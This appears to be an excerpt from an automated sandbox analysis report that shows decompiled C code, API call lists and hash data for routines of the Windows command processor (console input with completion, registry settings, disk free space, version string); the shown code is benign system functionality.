                                                      						_t143 = _t143 + (_t124 - _t137 >> 1) + _t65;
                                                      					} while ( *_t124 != 0);
                                                      					if(0 != _t143) {
                                                      						_t143 = _t143 + 1;
                                                      						_t69 = _t143 & 0x0000ffff;
                                                      						_v604 = _t143 & 0x0000ffff;
                                                      						_t116 = E4A731896((_t143 & 0x0000ffff) + _t69);
                                                      						if(_t116 != 0) {
                                                      							_t144 = _t116;
                                                      							if( *_t139 != 0) {
                                                      								do {
                                                      									_v624 = _v604 - (_t144 - _t116 >> 1);
                                                      									E4A73185A(_t144, _v604 - (_t144 - _t116 >> 1), _v608);
                                                      									E4A7320A9(_t144, _t144, _v624, _t139);
                                                      									_t114 = E4A73413B(_t139);
                                                      									_t139 = _t114;
                                                      									_t144 = E4A73413B(_t144);
                                                      								} while ( *_t114 != 0);
                                                      							}
                                                      							 *_t144 = 0;
                                                      							_t139 = E4A73E342(_v620, _v612, _a16, _t116, 1);
                                                      							E4A73142E(_t116);
                                                      							_t76 = _v608;
                                                      							_t128 = _t76 + 2;
                                                      							do {
                                                      								_t137 =  *_t76;
                                                      								_t76 = _t76 + 2;
                                                      							} while (_t137 != 0);
                                                      							_t116 = (_t76 - _t128 >> 1) + 2;
                                                      							_t143 = E4A731896(_t116 + _t116);
                                                      							_v604 = _t143;
                                                      							if(_t143 == 0) {
                                                      								goto L9;
                                                      							} else {
                                                      								E4A73185A(_t143, _t116, _v608);
                                                      								_t143 = E4A732ED1(_t143) + 2;
                                                      								E4A7320A9(_t143, _v604, _t116, E4A739FFC);
                                                      								_t87 = FindFirstFileW(_v604,  &_v600);
                                                      								_v608 = _t87;
                                                      								 *_t143 = 0;
                                                      								if(_t87 != 0xffffffff) {
                                                      									L16:
                                                      									while(1) {
                                                      										if((_v600.dwFileAttributes & 0x00000010) == 0) {
                                                      											L41:
                                                      											if(FindNextFileW(_v608,  &_v600) != 0) {
                                                      												continue;
                                                      											}
                                                      										} else {
                                                      											_t130 = E4A732EC4;
                                                      											_t92 =  &(_v600.cFileName);
                                                      											while(1) {
                                                      												_t137 =  *_t92;
                                                      												if(_t137 !=  *_t130) {
                                                      													break;
                                                      												}
                                                      												if(_t137 == 0) {
                                                      													L22:
                                                      													_t92 = 0;
                                                      												} else {
                                                      													_t137 =  *((intOrPtr*)(_t92 + 2));
                                                      													_t34 = _t130 + 2; // 0x5c0000
                                                      													if(_t137 !=  *_t34) {
                                                      														break;
                                                      													} else {
                                                      														_t92 = _t92 + 4;
                                                      														_t130 = _t130 + 4;
                                                      														if(_t137 != 0) {
                                                      															continue;
                                                      														} else {
                                                      															goto L22;
                                                      														}
                                                      													}
                                                      												}
                                                      												L24:
                                                      												if(_t92 == 0) {
                                                      													goto L41;
                                                      												} else {
                                                      													_t131 = E4A732EBC;
                                                      													_t93 =  &(_v600.cFileName);
                                                      													while(1) {
                                                      														_t137 =  *_t93;
                                                      														if(_t137 !=  *_t131) {
                                                      															break;
                                                      														}
                                                      														if(_t137 == 0) {
                                                      															L30:
                                                      															_t93 = 0;
                                                      														} else {
                                                      															_t137 =  *((intOrPtr*)(_t93 + 2));
                                                      															_t37 = _t131 + 2; // 0x2e
                                                      															if(_t137 !=  *_t37) {
                                                      																break;
                                                      															} else {
                                                      																_t93 = _t93 + 4;
                                                      																_t131 = _t131 + 4;
                                                      																if(_t137 != 0) {
                                                      																	continue;
                                                      																} else {
                                                      																	goto L30;
                                                      																}
                                                      															}
                                                      														}
                                                      														L32:
                                                      														if(_t93 == 0) {
                                                      															goto L41;
                                                      														} else {
                                                      															_t94 = _v604;
                                                      															_t138 = _t94 + 2;
                                                      															do {
                                                      																_t132 =  *_t94;
                                                      																_t94 = _t94 + 2;
                                                      															} while (_t132 != 0);
                                                      															_t133 = _t94 - _t138 >> 1;
                                                      															_t98 =  &(_v600.cFileName);
                                                      															_t137 = _t98 + 2;
                                                      															do {
                                                      																_t140 =  *_t98;
                                                      																_t98 = _t98 + 2;
                                                      															} while (_t140 != 0);
                                                      															_t141 = (_t98 - _t137 >> 1) + _t133 + 2;
                                                      															if(_t141 <= _t116) {
                                                      																L40:
                                                      																E4A7320A9(_t143, _v604, _t116,  &(_v600.cFileName));
                                                      																E4A7320A9(_t143, _v604, _t116, E4A732EC8);
                                                      																_t139 = E4A74BF0C(_v604, _v620, _v612, _a16, _v616);
                                                      																 *_t143 = 0;
                                                      																goto L41;
                                                      															} else {
                                                      																_t108 = E4A732536(_v604, _t141 + _t141);
                                                      																if(_t108 == 0) {
                                                      																	_t139 = 1;
                                                      																} else {
                                                      																	_v604 = _t108;
                                                      																	_t116 = _t141;
                                                      																	_t143 = E4A732ED1(_t108) + 2;
                                                      																	goto L40;
                                                      																}
                                                      															}
                                                      														}
                                                      														goto L44;
                                                      													}
                                                      													asm("sbb eax, eax");
                                                      													asm("sbb eax, 0xffffffff");
                                                      													goto L32;
                                                      												}
                                                      												goto L44;
                                                      											}
                                                      											asm("sbb eax, eax");
                                                      											asm("sbb eax, 0xffffffff");
                                                      											goto L24;
                                                      										}
                                                      										L44:
                                                      										FindClose(_v608);
                                                      										goto L45;
                                                      									}
                                                      								}
                                                      								L45:
                                                      								E4A73142E(_v604);
                                                      								_t66 = _t139;
                                                      							}
                                                      						} else {
                                                      							L9:
                                                      							_t66 = 1;
                                                      						}
                                                      					} else {
                                                      						goto L7;
                                                      					}
                                                      				}
                                                      				return E4A7313A9(_t66, _t116, _v8 ^ _t149, _t137, _t139, _t143);
                                                      			}


                                                      APIs
                                                        • Part of subcall function 4A731896: GetProcessHeap.KERNEL32(00000008,4A7325C0,4A7325BB,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?), ref: 4A7318A9
                                                        • Part of subcall function 4A731896: HeapAlloc.KERNEL32(00000000,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?,?,4A736CE6), ref: 4A7318B0
                                                      • FindFirstFileW.KERNEL32(?,?,?,?,Function_00009FFC,00000000,00000000,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 4A74C086
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$AllocFileFindFirstProcess
                                                      • String ID:
                                                      • API String ID: 2094127529-0
                                                      • Opcode ID: cebb4e28142f36aabcfda4fbc17b3b4f93cc50f6d82902c426e31792a4f2f078
                                                      • Instruction ID: d5547e9ce62031cae1de1329b2e942fbea25d98ca9b850094f81486a517a3b00
                                                      • Opcode Fuzzy Hash: cebb4e28142f36aabcfda4fbc17b3b4f93cc50f6d82902c426e31792a4f2f078
                                                      • Instruction Fuzzy Hash: 85813931A0951AAFDB749F74CC48AEA7FB9EF54350F0202A4D905EB161EB71CE89CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A743185(intOrPtr __ebx, void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				short _v532;
                                                      				signed int _v536;
                                                      				union _ULARGE_INTEGER _v540;
                                                      				union _ULARGE_INTEGER _v548;
                                                      				union _ULARGE_INTEGER _v556;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t21;
                                                      				intOrPtr _t43;
                                                      				void* _t44;
                                                      				intOrPtr _t47;
                                                      				signed int _t51;
                                                      
                                                      				_t47 = __edx;
                                                      				_t44 = __ecx;
                                                      				_t43 = __ebx;
                                                      				_t21 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t21 ^ _t51;
                                                      				_t48 = _a4;
                                                      				E4A73AA4F(_a4);
                                                      				E4A73185A( &_v532, 0x106, _a8);
                                                      				if(E4A742620( &_v532) != 0) {
                                                      					E4A7320A9(0x106,  &_v532, 0x106, E4A732EC8);
                                                      				}
                                                      				_v536 = _v536 & 0x00000000;
                                                      				_v540.LowPart = _v540.LowPart & 0x00000000;
                                                      				GetDiskFreeSpaceExW( &_v532,  &_v540,  &_v556,  &_v548);
                                                      				E4A742CB6(_t44, _t48, 6);
                                                      				E4A74292F(_a12,  &_v540, 0xe,  &_v532, 0x106);
                                                      				return E4A7313A9(E4A74301F(_t47, _t48, 0x2379, 2, E4A739A2C(L"%5lu", _a16)), _t43, _v8 ^ _t51, _t47, _t48, 0x106,  &_v532);
                                                      			}


                                                      APIs
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?,?,?,00000106,?,?,00000106,?), ref: 4A7431F9
                                                        • Part of subcall function 4A74292F: wcsncmp.MSVCRT(?,4A754920,?,?,?,?), ref: 4A7429ED
                                                        • Part of subcall function 4A74301F: FormatMessageW.KERNEL32(00001900,00000000,00000000,00000000,?,0000000A,?,?,?,?), ref: 4A74305C
                                                        • Part of subcall function 4A74301F: LocalFree.KERNEL32(?,?,?), ref: 4A743088
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Free$DiskFormatLocalMessageSpacewcsncmp
                                                      • String ID: %5lu
                                                      • API String ID: 482386376-2100233843
                                                      • Opcode ID: 9f8d375f1a152a65c548c041b65d366c6571dbb2fe2fc964397f5129630fbf77
                                                      • Instruction ID: 4c0618e4e428eee7e0819c666bcee31ec6815499400379c6a9b6835270451e06
                                                      • Opcode Fuzzy Hash: 9f8d375f1a152a65c548c041b65d366c6571dbb2fe2fc964397f5129630fbf77
                                                      • Instruction Fuzzy Hash: 1C216F7294411DBADB30DA90CC88FEF777CAF55310F050595F605EA042DA709B88CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E4A73D3B3(intOrPtr _a4, intOrPtr _a8) {
                                                      				signed char _t3;
                                                      
                                                      				_t3 = GetVersion();
                                                      				_push(_t3 >> 0x00000010 & 0x00003fff);
                                                      				_push(_t3 >> 0x00000008 & 0x000000ff);
                                                      				return E4A73179D(_a4, _a8, L"%d.%d.%04d", _t3 & 0x000000ff);
                                                      			}





                                                      APIs
                                                      • GetVersion.KERNEL32(?,4A73C88C,?,00000020), ref: 4A73D3B8
                                                        • Part of subcall function 4A73179D: _vsnwprintf.MSVCRT ref: 4A7317CB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Version_vsnwprintf
                                                      • String ID: %d.%d.%04d
                                                      • API String ID: 2848646618-2515412502
                                                      • Opcode ID: 95691abfa390e0d480161e5682a9f679d3bdf38c796b3cf165d3180dfa78acae
                                                      • Instruction ID: d1123d7e13a0254319d66f2f42e29ab608a4d93768fcb724cd84036fdb581b65
                                                      • Opcode Fuzzy Hash: 95691abfa390e0d480161e5682a9f679d3bdf38c796b3cf165d3180dfa78acae
                                                      • Instruction Fuzzy Hash: 59D02BB250940B3BDF281624DC15D79379DD7D0300B454078BD0BC5183DE354A24D3A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetSystemTime.KERNEL32(?,00002000,4A760640,75A9A9E9), ref: 4A744E4F
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 4A744E63
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Time$System$File
                                                      • String ID:
                                                      • API String ID: 2838179519-0
                                                      • Opcode ID: 72dde1aaa667d25df0036c3f1e6a331802687fb5ba1e23608bf17df89102c3d7
                                                      • Instruction ID: e1e031d432f4ff1450810ab5f7f2e4933398731b00e9a17ec32bec70fc2d98ea
                                                      • Opcode Fuzzy Hash: 72dde1aaa667d25df0036c3f1e6a331802687fb5ba1e23608bf17df89102c3d7
                                                      • Instruction Fuzzy Hash: 51D0C9B280915C9FCF229BE0CC489DB7BBCBF0A382F0505D2E245D7401D631AA59CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 4A737C68
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 56d35c88499024af53fc77dd2c83fafd6c6dcfa635bb21a256ca949e7a8c142c
                                                      • Instruction ID: 6f6062ebf520129d4323d670ba07d1cb49a1e40834e424a94bedf2bd5719de92
                                                      • Opcode Fuzzy Hash: 56d35c88499024af53fc77dd2c83fafd6c6dcfa635bb21a256ca949e7a8c142c
                                                      • Instruction Fuzzy Hash: E09002B1516140469E6117F0490998726B46A9915375204506701CCC08DF114404E791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E4A7434E2(void* _a4, void* _a8, long _a12, DWORD* _a16) {
                                                      				void* _v8;
                                                      				struct _COORD _v12;
                                                      				void* _v16;
                                                      				long _v20;
                                                      				long _v24;
                                                      				int _v28;
                                                      				void* _v32;
                                                      				signed int _v36;
                                                      				void* _v40;
                                                      				void _v44;
                                                      				intOrPtr _v62;
                                                      				struct _CONSOLE_SCREEN_BUFFER_INFO _v68;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t71;
                                                      				int _t72;
                                                      				int _t82;
                                                      				signed int _t86;
                                                      				signed int _t87;
                                                      				signed int _t92;
                                                      				void* _t94;
                                                      				signed int _t96;
                                                      				long _t97;
                                                      				void* _t98;
                                                      				void* _t104;
                                                      				int _t109;
                                                      				void* _t110;
                                                      				DWORD* _t127;
                                                      				void* _t129;
                                                      				void* _t130;
                                                      				signed char _t132;
                                                      				signed char _t133;
                                                      				signed int _t134;
                                                      				signed int _t135;
                                                      				signed int _t136;
                                                      				signed int _t137;
                                                      				signed int _t138;
                                                      				signed int _t141;
                                                      				signed int _t144;
                                                      				signed int _t145;
                                                      				void* _t146;
                                                      				void* _t147;
                                                      				signed int _t150;
                                                      				signed int _t151;
                                                      				void* _t154;
                                                      				long _t157;
                                                      				signed int _t158;
                                                      				void* _t160;
                                                      				void* _t167;
                                                      				void* _t172;
                                                      				void* _t173;
                                                      
                                                      				_t71 = GetStdHandle(0xfffffff5);
                                                      				_v16 = _t71;
                                                      				if(_t71 == 0xffffffff) {
                                                      					__imp___get_osfhandle(1);
                                                      					_v16 = _t71;
                                                      				}
                                                      				if( *0x4a754081 == 0 ||  *0x4a7540a0 >= 0x20 ||  *0x4a7540a4 >= 0x20 || GetConsoleScreenBufferInfo(_v16,  &_v68) == 0) {
                                                      					_t72 = ReadConsoleW(_a4, _a8, _a12, _a16, 0);
                                                      				} else {
                                                      					_t132 =  *0x4a7540a4; // 0x20
                                                      					_v12 = _v68.dwCursorPosition;
                                                      					_t133 =  *0x4a7540a0; // 0x20
                                                      					_t144 = 1 << _t133;
                                                      					_t157 = 0;
                                                      					_v44 = 0x10;
                                                      					_v40 = 0;
                                                      					_v36 = 1 << _t132 | 1;
                                                      					_v32 = 0;
                                                      					E4A743599();
                                                      					_t154 = _a8;
                                                      					_v8 = 0;
                                                      					while(1) {
                                                      						L6:
                                                      						_t127 = _a16;
                                                      						_t82 = ReadConsoleW(_a4, _t154, _a12, _t127,  &_v44);
                                                      						_v28 = _t82;
                                                      						_t83 =  *_t127;
                                                      						_v24 =  *_t127;
                                                      						_t167 =  *0x4a7541b4 - _t157; // 0x0
                                                      						if(_t167 != 0) {
                                                      							E4A731E6C(_t83);
                                                      							if(_v8 != _t157) {
                                                      								HeapFree(GetProcessHeap(), _t157, _v8);
                                                      							}
                                                      							_v8 = _t157;
                                                      						}
                                                      						if(_v28 == _t157) {
                                                      							break;
                                                      						}
                                                      						_a8 = _t157;
                                                      						_t86 = 0;
                                                      						_t158 = _t157 | 0xffffffff;
                                                      						_t145 = _t144 | 0xffffffff;
                                                      						if( *_t127 <= 0) {
                                                      							L18:
                                                      							_t157 = 0;
                                                      							break;
                                                      						} else {
                                                      							while(1) {
                                                      								_t134 =  *(_t154 + _t86 * 2) & 0x0000ffff;
                                                      								if(_t134 == 0xd) {
                                                      									break;
                                                      								}
                                                      								_t172 = _t134 -  *0x4a7540a0; // 0x20
                                                      								if(_t172 == 0) {
                                                      									_t158 = _t86;
                                                      									goto L26;
                                                      								} else {
                                                      									_t173 = _t134 -  *0x4a7540a4; // 0x20
                                                      									if(_t173 == 0) {
                                                      										_t158 = _t86;
                                                      										_a8 = 1;
                                                      										L25:
                                                      										__eflags = _t145 - 0xffffffff;
                                                      										if(_t145 != 0xffffffff) {
                                                      											goto L18;
                                                      										} else {
                                                      											L26:
                                                      											__eflags = _t158 - 0xffffffff;
                                                      											if(_t158 == 0xffffffff) {
                                                      												goto L18;
                                                      											} else {
                                                      												_t135 = _v8;
                                                      												_t87 = 0;
                                                      												 *_t127 = _t158;
                                                      												 *((short*)(_t154 + _t158 * 2)) = 0;
                                                      												__eflags = _t135;
                                                      												if(_t135 == 0) {
                                                      													L37:
                                                      													_t129 = 1;
                                                      													__eflags = 1;
                                                      												} else {
                                                      													_t87 = _t154;
                                                      													while(1) {
                                                      														_t150 =  *_t87;
                                                      														__eflags = _t150 -  *_t135;
                                                      														if(_t150 !=  *_t135) {
                                                      															break;
                                                      														}
                                                      														__eflags = _t150;
                                                      														if(_t150 == 0) {
                                                      															L33:
                                                      															_t87 = 0;
                                                      														} else {
                                                      															_t151 =  *((intOrPtr*)(_t87 + 2));
                                                      															__eflags = _t151 -  *((intOrPtr*)(_t135 + 2));
                                                      															if(_t151 !=  *((intOrPtr*)(_t135 + 2))) {
                                                      																break;
                                                      															} else {
                                                      																_t87 = _t87 + 4;
                                                      																_t135 = _t135 + 4;
                                                      																__eflags = _t151;
                                                      																if(_t151 != 0) {
                                                      																	continue;
                                                      																} else {
                                                      																	goto L33;
                                                      																}
                                                      															}
                                                      														}
                                                      														L35:
                                                      														__eflags = _t87;
                                                      														if(_t87 != 0) {
                                                      															goto L37;
                                                      														} else {
                                                      															_t129 = 0;
                                                      														}
                                                      														goto L38;
                                                      													}
                                                      													asm("sbb eax, eax");
                                                      													asm("sbb eax, 0xffffffff");
                                                      													goto L35;
                                                      												}
                                                      												L38:
                                                      												__eflags = _a8;
                                                      												if(__eflags == 0) {
                                                      													__eflags = _t158 - 2;
                                                      													if(__eflags > 0) {
                                                      														__imp___wcsnicmp(_t154, "cd ", 3);
                                                      														_t160 = _t160 + 0xc;
                                                      														__eflags = _t87;
                                                      														if(__eflags == 0) {
                                                      															L47:
                                                      															_a8 = 1;
                                                      														} else {
                                                      															__imp___wcsnicmp(_t154, "rd ", 3);
                                                      															_t160 = _t160 + 0xc;
                                                      															__eflags = _t87;
                                                      															if(__eflags == 0) {
                                                      																goto L47;
                                                      															} else {
                                                      																__imp___wcsnicmp(_t154, "md ", 3);
                                                      																_t160 = _t160 + 0xc;
                                                      																__eflags = _t87;
                                                      																if(__eflags == 0) {
                                                      																	goto L47;
                                                      																} else {
                                                      																	__imp___wcsnicmp(_t154, L"chdir ", 6);
                                                      																	_t160 = _t160 + 0xc;
                                                      																	__eflags = _t87;
                                                      																	if(__eflags == 0) {
                                                      																		goto L47;
                                                      																	} else {
                                                      																		__imp___wcsnicmp(_t154, L"rmdir ", 6);
                                                      																		_t160 = _t160 + 0xc;
                                                      																		__eflags = _t87;
                                                      																		if(__eflags == 0) {
                                                      																			goto L47;
                                                      																		} else {
                                                      																			__imp___wcsnicmp(_t154, L"mkdir ", 6);
                                                      																			_t160 = _t160 + 0xc;
                                                      																			__eflags = _t87;
                                                      																			if(__eflags == 0) {
                                                      																				goto L47;
                                                      																			} else {
                                                      																				__imp___wcsnicmp(_t154, L"pushd ", 6);
                                                      																				_t160 = _t160 + 0xc;
                                                      																				__eflags = _t87;
                                                      																				if(__eflags == 0) {
                                                      																					goto L47;
                                                      																				}
                                                      																			}
                                                      																		}
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      												_push(_t129);
                                                      												_push(_a8);
                                                      												_push( !(_v32 >> 4) & 0x00000001);
                                                      												_push(_t158);
                                                      												_push(_a12);
                                                      												_push(_t154);
                                                      												_t92 = E4A751877(_t129, _t154, _t158, __eflags);
                                                      												__eflags = _t92;
                                                      												if(_t92 == 0) {
                                                      													 *0x4a754034(0xffffffff);
                                                      													_t94 = _t154;
                                                      													_t59 = _t94 + 2; // 0x8
                                                      													_t146 = _t59;
                                                      													do {
                                                      														_t136 =  *_t94;
                                                      														_t94 = _t94 + 2;
                                                      														__eflags = _t136;
                                                      													} while (_t136 != 0);
                                                      													_t96 = _t94 - _t146;
                                                      													__eflags = _t96;
                                                      													_t97 = _t96 >> 1;
                                                      												} else {
                                                      													_t130 = _v16;
                                                      													_t109 = GetConsoleScreenBufferInfo(_t130,  &_v68);
                                                      													__eflags = _t109;
                                                      													if(_t109 != 0) {
                                                      														_t141 = _v62 - (_v12.X + _t158) / _v68.dwSize;
                                                      														__eflags = _t141;
                                                      														_v12.Y = _t141;
                                                      													}
                                                      													_t110 = _t154;
                                                      													_t50 = _t110 + 2; // 0x8
                                                      													_t147 = _t50;
                                                      													do {
                                                      														_t138 =  *_t110;
                                                      														_t110 = _t110 + 2;
                                                      														__eflags = _t138;
                                                      													} while (_t138 != 0);
                                                      													_v20 = _t110 - _t147 >> 1;
                                                      													SetConsoleCursorPosition(_t130, _v12);
                                                      													_push( &_v24);
                                                      													_push(_v12);
                                                      													_push(_v24);
                                                      													_push(0x20);
                                                      													_push(_t130);
                                                      													FillConsoleOutputCharacterW();
                                                      													WriteConsoleW(_t130, _t154, _v20,  &_v20, 0);
                                                      													_t97 = _v20;
                                                      												}
                                                      												__eflags = _v8;
                                                      												_v40 = _t97;
                                                      												if(_v8 != 0) {
                                                      													HeapFree(GetProcessHeap(), 0, _v8);
                                                      												}
                                                      												_t98 = _t154;
                                                      												_t63 = _t98 + 2; // 0x8
                                                      												_t144 = _t63;
                                                      												do {
                                                      													_t137 =  *_t98;
                                                      													_t98 = _t98 + 2;
                                                      													__eflags = _t137;
                                                      												} while (_t137 != 0);
                                                      												_t64 = (_t98 - _t144 >> 1) + 1; // 0x9
                                                      												_t159 = _t64;
                                                      												_t104 = HeapAlloc(GetProcessHeap(), 0, _t64 + _t64);
                                                      												_v8 = _t104;
                                                      												__eflags = _t104;
                                                      												if(_t104 == 0) {
                                                      													_t72 = 0;
                                                      												} else {
                                                      													E4A73185A(_t104, _t159, _t154);
                                                      													_t157 = 0;
                                                      													goto L6;
                                                      												}
                                                      											}
                                                      										}
                                                      									} else {
                                                      										_t86 = _t86 + 1;
                                                      										if(_t86 <  *_t127) {
                                                      											continue;
                                                      										} else {
                                                      											goto L18;
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L65;
                                                      							}
                                                      							_t145 = _t86;
                                                      							goto L25;
                                                      						}
                                                      						goto L65;
                                                      					}
                                                      					if(_v8 != _t157) {
                                                      						HeapFree(GetProcessHeap(), _t157, _v8);
                                                      					}
                                                      					_t72 = _v28;
                                                      				}
                                                      				L65:
                                                      				return _t72;
                                                      			}

                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F5,?,00000004,74EC5129,00000000,?,4A73745B,-00000003,00000000,00000000,00000000,00000000,?), ref: 4A7434EC
                                                      • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A743531
                                                      • ReadConsoleW.KERNEL32(4A754210,00000006,00000021,?,00000010), ref: 4A743589
                                                      • _get_osfhandle.MSVCRT ref: 4A744237
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,4A73745B), ref: 4A744264
                                                      • HeapFree.KERNEL32(00000000,?,4A73745B), ref: 4A74426B
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,4A73745B), ref: 4A7442B4
                                                      • HeapFree.KERNEL32(00000000,?,4A73745B), ref: 4A7442BB
                                                        • Part of subcall function 4A731E6C: EnterCriticalSection.KERNEL32(4A73851C), ref: 4A731E72
                                                        • Part of subcall function 4A731E6C: LeaveCriticalSection.KERNEL32(?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210,?,4A731C8D), ref: 4A731E85
                                                      • _wcsnicmp.MSVCRT ref: 4A744346
                                                      • _wcsnicmp.MSVCRT ref: 4A74435B
                                                      • _wcsnicmp.MSVCRT ref: 4A744370
                                                      • _wcsnicmp.MSVCRT ref: 4A744385
                                                      • _wcsnicmp.MSVCRT ref: 4A74439A
                                                      • _wcsnicmp.MSVCRT ref: 4A7443AF
                                                      • _wcsnicmp.MSVCRT ref: 4A7443C4
                                                      • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A7443FE
                                                      • SetConsoleCursorPosition.KERNEL32 ref: 4A744439
                                                      • FillConsoleOutputCharacterW.KERNEL32(00000001,00000020,?,4A754210,?), ref: 4A74444C
                                                      • WriteConsoleW.KERNEL32 ref: 4A74445D
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 4A744491
                                                      • HeapFree.KERNEL32(00000000), ref: 4A744498
                                                      • GetProcessHeap.KERNEL32(00000000,00000008,?,4A73745B), ref: 4A7444BA
                                                      • HeapAlloc.KERNEL32(00000000,?,4A73745B), ref: 4A7444C1
                                                      • ReadConsoleW.KERNEL32(4A754210,00000006,00000021,?,00000000), ref: 4A7444EF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Heap$Console_wcsnicmp$Process$Free$BufferCriticalInfoReadScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                      • API String ID: 1493623682-3100821235
                                                      • Opcode ID: 65c314b9a9535682925f20fb3b9f742b7c24e01664218670a66acc783491e256
                                                      • Instruction ID: fc7020f07fc6e1e3882759c0e283fb6afa6b50658b4897a7d928bb2eda6fcdf0
                                                      • Opcode Fuzzy Hash: 65c314b9a9535682925f20fb3b9f742b7c24e01664218670a66acc783491e256
                                                      • Instruction Fuzzy Hash: 07B13576944216EBDF709FA4CC49BAE7FBDEF0575AF018110F912E6580D7308A18EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E4A737E13(int _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				long _v4104;
                                                      				int _v4108;
                                                      				int _v4112;
                                                      				void* _v4116;
                                                      				intOrPtr* _v4120;
                                                      				char _v4124;
                                                      				intOrPtr _v4128;
                                                      				intOrPtr _v4132;
                                                      				char _v4136;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t99;
                                                      				int _t101;
                                                      				signed int _t113;
                                                      				signed int _t117;
                                                      				signed int _t121;
                                                      				long _t135;
                                                      				int _t136;
                                                      				long _t139;
                                                      				wchar_t* _t140;
                                                      				signed int _t143;
                                                      				wchar_t* _t144;
                                                      				signed int _t147;
                                                      				wchar_t* _t148;
                                                      				signed int _t151;
                                                      				signed int _t155;
                                                      				int _t161;
                                                      				int _t162;
                                                      				intOrPtr _t165;
                                                      				void* _t174;
                                                      				void* _t175;
                                                      				wchar_t** _t176;
                                                      				signed int _t178;
                                                      				void* _t179;
                                                      				void* _t181;
                                                      
                                                      				E4A732C26(0x1024);
                                                      				_t99 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t99 ^ _t178;
                                                      				_t101 = _a4;
                                                      				_t174 = 2;
                                                      				_v4136 = 0x80000002;
                                                      				_v4132 = 0x80000001;
                                                      				if(_a8 < _t174) {
                                                      					L40:
                                                      					return E4A7313A9(_t101, _t161, _v8 ^ _t178, _t174, _t175, _t176);
                                                      				} else {
                                                      					if( *0x4a770670 != 0) {
                                                      						 *0x4a754081 = 1;
                                                      					}
                                                      					_push(__ebx);
                                                      					__ecx =  &_v4136;
                                                      					_push(__esi);
                                                      					__ecx =  &_v4136 - __eax;
                                                      					_push(__edi);
                                                      					__edi = RegQueryValueExW;
                                                      					_v4120 = __eax;
                                                      					_v4128 = __ecx;
                                                      					_v4124 = __edx;
                                                      					__ebx = 0x1000;
                                                      					while(1) {
                                                      						_t176 = 0;
                                                      						_t101 = RegOpenKeyExW( *(_t165 + _v4120), L"Software\\Microsoft\\Command Processor", 0, 0x2000000,  &_v4116);
                                                      						if(_t101 != 0) {
                                                      							goto L38;
                                                      						}
                                                      						_v4108 = 0;
                                                      						_v4112 = _t161;
                                                      						_t113 = RegQueryValueExW(_v4116, L"DisableUNCCheck", 0,  &_v4108,  &_v4104,  &_v4112);
                                                      						if(_t113 == 0) {
